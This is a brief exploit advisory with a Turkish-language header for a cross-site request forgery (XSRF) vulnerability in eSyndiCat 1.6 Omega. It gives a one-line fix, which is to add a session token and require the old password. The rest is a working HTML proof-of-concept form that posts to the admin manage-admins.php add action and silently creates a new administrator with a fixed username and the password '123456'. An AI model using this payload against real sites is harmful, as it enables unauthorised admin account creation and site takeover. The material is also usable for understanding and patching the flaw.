< ------------------- header data start ------------------- >

#############################################################

# Application Name : eSyndiCat 1.6 Omega

# Vulnerable Type : Xsrf

# Infection : Yeni admin eklenebilir veya Uzaktan otomatik olarak admin pass change edilebilir

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<form action=http://omega.esyndicat.com/admin/manage-admins.php?action=add method=post name=manage_admins id=manage_admins>
<td width=200><strong>Admin username:</strong>
<input type=text name=username size=22 value=system/>
<strong>Admin Full Name:</strong>
<input type=text name=fullname size=22 value=exxe/>
<strong>Admin Email:</strong></td>
<input type=text name=email size=22 value=[email protected] />
<strong>Admin password:</strong></td>
<input type=password name=new_pass size=22 value=123456 />
<strong>Admin password Confirmation:</strong></td>
<input type=password name=new_pass2 size=22 value=123456 />
<td><strong>Submission Notification:</strong></td>
<input type=radio name=submit_notif value=1 id=lsn1 /><label for=lsn1>Enabled</label>
<input type=submit name=save value=Save Changes class=button />
</form>


< -- bug code end of -- >